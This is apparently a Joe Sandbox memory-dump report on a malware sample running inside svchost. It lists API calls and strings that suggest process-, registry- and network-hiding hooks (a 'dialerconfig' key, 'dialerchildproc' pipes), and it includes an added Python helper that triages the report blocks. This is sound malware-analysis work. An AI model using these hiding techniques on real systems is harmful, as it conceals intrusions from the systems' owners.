                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: a68df60460c540e5a9242f56c6b8bfc5263ec75fa9e1868138209c41af1d70d8
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 0BB1BF72A28AA092EB6A8F25C4447E963B5F74AB8CF445017EE4D53B95EF35CCC8C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 58b78ca673e8f1c025eb56569f683145776f8da21aff7224e17a305cb7f8da99
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: FC317072619B908AEB619F60E8503EE7371F785748F44402ADB8D57B94EF38C54CC714
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: fac0d66ec64c3925cbc38e830e94581c1ed51f6a25e90594bb5b961479521937
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: C8315F32618B9096EB61CF25E8503DE73B4F78A758F540126EA9D53B94EF38C659CB00

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 206c1a27e464331c4bd0b9a092aeafa2340499ab111ab09f1a96645441c587cd
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: A371F136B18A2485FB11AF66E8A0ADD3374F786B8CF401122DE4E57B69EF38C548C744

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 6227fafc9fbf8ae47cd58b7f6cf4b5d99e6e7defb89df161162dad1074e44a04
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 83517C72A18B9886EB51CF66E45839A77B1F38AF89F444126DE8D47718EF3CC049CB00

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: ba4581b48e2ff6b855cacc301ebdcd167c7a3886c66976a807292e1e89fccdae
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: AF315074E299AAA0FE17EF65E8616D46371B70634CFC05023D84D13766AE7C868EC750

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 00000179537ACE37
                                                              • FlsGetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACEBC
                                                              • SetLastError.KERNEL32 ref: 00000179537ACED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,00000179537AECCC,?,?,?,?,00000179537ABF9F,?,?,?,?,?,00000179537A7AB0), ref: 00000179537ACF2C
                                                                • Part of subcall function 00000179537AD6CC: HeapAlloc.KERNEL32 ref: 00000179537AD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF54
                                                                • Part of subcall function 00000179537AD744: HeapFree.KERNEL32 ref: 00000179537AD75A
                                                                • Part of subcall function 00000179537AD744: GetLastError.KERNEL32 ref: 00000179537AD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000179537B0A6B,?,?,?,00000179537B045C,?,?,?,00000179537AC84F), ref: 00000179537ACF76
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: 77b7efc725698ca54b94f8a3bbd63b6bf6571e27a76a959dc314b8d8e9e59c42
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: FA41D370F2C27951FA2BA73149553E923B15B477BCF1C4737A83E867DADE28C4494200

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: bf197e0ffd1960bdac6007c57ce7df944ff2740a99a669adc726ba4408a275dc
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 06214F32A1876482FB118B25F45479973B1F78ABA8F504216EB9D03BA8DF3CC14DCB04

                                                              Control-flow Graph

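The listing above records one block per recovered function: the API calls with their ref addresses, the "API ID" and "String ID" fields (several values are joined with "$"), and the opcode and instruction hashes, with "Instruction Fuzzy Hash" closing each block. Added example, not Joe Sandbox output and not code from the sample: a Python helper that parses these blocks and separates the ones worth a human look, such as the function that names \\.\pipe\dialerchildproc32 and \\.\pipe\dialerchildproc64 next to process and Wow64 APIs, from blocks whose only strings are statically linked MSVC CRT boilerplate (csm, api-ms-, ext-ms-, CorExitProcess/mscoree.dll, CONOUT$). The field layout is taken from this listing; the CRT string list, the tag names and the sample input are assumptions of the example.

```python
"""Added triage helper: parse per-function blocks of a Joe Sandbox listing and tag them."""
import re
from dataclasses import dataclass, field

# Constructed sample in the listing's own layout (four function blocks). Pipe names and
# API IDs are copied from the report; hashes are truncated, and the last block is cut
# off after "String ID" the way the listing above is.
SAMPLE_REPORT = r"""
APIs
• GetLastError.KERNEL32 ref: 00000179537ACE37
• FlsGetValue.KERNEL32(?,?,?,00000179537B0A6B), ref: 00000179537ACE4C
  • Part of subcall function 00000179537AD6CC: HeapAlloc.KERNEL32 ref: 00000179537AD721
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• Opcode ID: 3a29360f60df60ad
• Instruction Fuzzy Hash: FA41D370F2C27951
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• Opcode ID: d76f145db3bc14c8
• Instruction Fuzzy Hash: 06214F32A1876482
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• Opcode ID: 186f03c70d0fb897
• Instruction Fuzzy Hash: DCE18E72A28BA48A
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
"""

FIELD_RE = re.compile(r"^\s*•\s*(API ID|String ID|API String ID|Opcode ID|Instruction ID|"
                      r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File|Snapshot File):\s*(.*?)\s*$")
# "• Api.MODULE(args), ref: addr", optionally prefixed with "Part of subcall function X:"
CALL_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                     r"(\w+)\.(\w+)\b.*\bref:\s*([0-9A-Fa-f]+)")
PIPE_PREFIX = "\\\\.\\pipe\\"          # the literal text \\.\pipe\
# Assumption: strings emitted by statically linked MSVC CRT code (EH magic, API-set
# probing, CLR exit hook, console handle); a block with only these is runtime noise.
CRT_STRINGS = {"csm", "api-ms-", "ext-ms-", "CorExitProcess", "mscoree.dll", "CONOUT"}
CRT_API_MARKERS = ("__scrt_", "__except_validate_context_record", "Unwind", "bad_alloc")


@dataclass
class FunctionBlock:
    fields: dict = field(default_factory=dict)
    calls: list = field(default_factory=list)   # (api, module, ref address)

    @property
    def strings(self):
        # The listing joins several strings with '$'; a literal '$' (CONOUT$) is therefore
        # ambiguous, so every non-empty piece is treated as one string.
        return [s for s in self.fields.get("String ID", "").split("$") if s]

    @property
    def api_text(self):
        return self.fields.get("API ID", "").replace("$", " ")


def parse_blocks(text):
    """Split the listing into blocks; 'Instruction Fuzzy Hash' closes each one."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if m:
            cur.calls.append(m.groups())
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        cur.fields[m.group(1)] = m.group(2)
        if m.group(1) == "Instruction Fuzzy Hash":
            blocks.append(cur)
            cur = FunctionBlock()
    if cur.fields or cur.calls:            # keep the block the report was truncated in
        blocks.append(cur)
    return blocks


def triage(block):
    tags = set()
    strs, api = block.strings, block.api_text
    if any(s.startswith(PIPE_PREFIX) for s in strs):
        tags.add("named-pipe")             # IPC endpoint to look for on the host
    if "Process" in api and "Wow64" in api and ("Write" in api or "Thread" in api):
        tags.add("process-and-wow64")      # heuristic: cross-bitness process handling
    if (strs and all(s in CRT_STRINGS for s in strs)) or any(m in api for m in CRT_API_MARKERS):
        tags.add("crt-boilerplate")
    return sorted(tags)


def triage_report(text):
    """Map each block's Opcode ID (or '<truncated>') to its sorted tags."""
    return {b.fields.get("Opcode ID", "<truncated>"): triage(b) for b in parse_blocks(text)}


def review_queue(text):
    """Opcode IDs that carry an indicator and are not CRT noise."""
    return [oid for oid, tags in triage_report(text).items()
            if tags and "crt-boilerplate" not in tags]


if __name__ == "__main__":
    for oid, tags in triage_report(SAMPLE_REPORT).items():
        print(oid, tags)
    print("review:", review_queue(SAMPLE_REPORT))
```

Run it against the saved report text instead of SAMPLE_REPORT to get the review queue for the whole dump; on this sample only the named-pipe block survives the CRT filter, and the Fls/Heap block, which has calls but no strings, carries no tag at all.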
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: 48bad793c3cf8a064d8991e65e6d6caa703c72e63802b69e7c4d4fa44d5e9957
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: DCE18E72A28BA48AEBA2DF65D4803DD77B0F746B9CF100116EE8D57B95CB34C599CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: 6d28e7484422e4a57a06ac6147cde09464f9819a0b3aea55b6358727e73b2730
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 3C41B532B2DA2091FB17DB66AC147D523B1BB46BA8F1941279D2E87784EF38C44DC324
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: 4d0dabdc3bb95f01b52548fecc3f9169e00d7fa873fa5b6aedad960dda8fc516
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: 8E416C73618B94C6E761CF21E45479A77B1F389B9CF44812AEB8947B58EF38C489CB00
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD087
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,00000179537AC7DE,?,?,?,?,?,?,?,?,00000179537ACF9D,?,?,00000001), ref: 00000179537AD0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: b0a3c49dc6ef7a53409216961fbfbc30d008a76d59ac91324fc92d9a86fd0cd9
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: C311C870F2C26841FA6B673699613EA63715B473FCF144337A83D477EADE28C54A8200
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 03549ce5a8bfb50d1d2883e7ce9a3f420bf030cad668bfca8cca14f47c08375e
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: CD81B531E2C2E146FB57ABA994513D923F2AB4778CF5444A7EA4CC7796EB38C44D8700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 1c35a6318a95a9f66357ff113d1e6293aa460ab4329f98c61122d8ffc54845e1
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: 5731D832B2E664E1EE13DB02A400BD963F4B74BBA8F5905279D5E47791EF38C45D8300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: 1d5e788c20f4153e52296bcb8cadabdf0028e11074e208d04bdcdd6a952d3e19
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: 1C11C431B18BA482F7518B52E864359B3B4F389FE8F044226EA9E87794EF38C4488744
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: 5fea20ec1214d5790932143d42f439680bcd659adb70575157f6ec8973a68838
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 76115E36B1875582FF159F52E4186A963B4FB4AB89F44002ADF8D07B54EF3DC509C714
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: 24d1bd52570d84dc27a6b3ebe3a983c1cff3cda0c085934ba3b1615b2ee42aa2
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: B5D1A876619B9882DA71DB1AE49039A77B0F3C9B98F100117EACD47BA9DF3CC555CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 59910d8593d4568c8529067d3d7f690041ca8a68c9534a4d3212bb0acc98c89f
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 12319232B19B65C2FA56DF56E5407AA67B1FB46B88F084022DF8C47B55EF34C4A98700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: 8609c7cee23a4da2cb73d7b9a2e9104af3180433e72c296c04d1e0e8fdc5031b
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: C811A270B2C26881FA2BA73259653E923715B477FCF144327A83E477DAEE28C5499200
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: 56b2cd84fcc0e7ced0197c83fadfe9882c07905c38d9d912c2a518943b9c5019
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: 51016931B08A5482FB11DB52A8A879963B5F789BC8F888036DE8D43754EF3CC98DC704
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                              • String ID:
                                                              • API String ID: 449555515-0
                                                              • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction ID: d2470d701e98e81108f06155ee65d957e7b349e728d52e6fd90ae972be3b8938
                                                              • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                              • Instruction Fuzzy Hash: DD012D75B1975882FF269B62E86879573B0FB5AB8AF04042ACE8D07754EF3DC50C8704
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                              • String ID: csm$f
                                                              • API String ID: 2395640692-629598281
                                                              • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction ID: 523c0386b4c626f6db8f57a49f1f760a6df895bac009b115f0e0608c5af323b5
                                                              • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                              • Instruction Fuzzy Hash: 0E51B232B2962886EB56DF15E448B9D37B6F347B8CF108126DA0E47788EB75CC59C704
APIs
Strings
Memory Dump Source
• Source File: 00000042.00000002.3070446099.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_66_2_179537a0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
• Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
• Instruction ID: 296e92441388b6fc06103b0115ebcdacb288d64441a59e498690bc521cbf3a7d
• Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
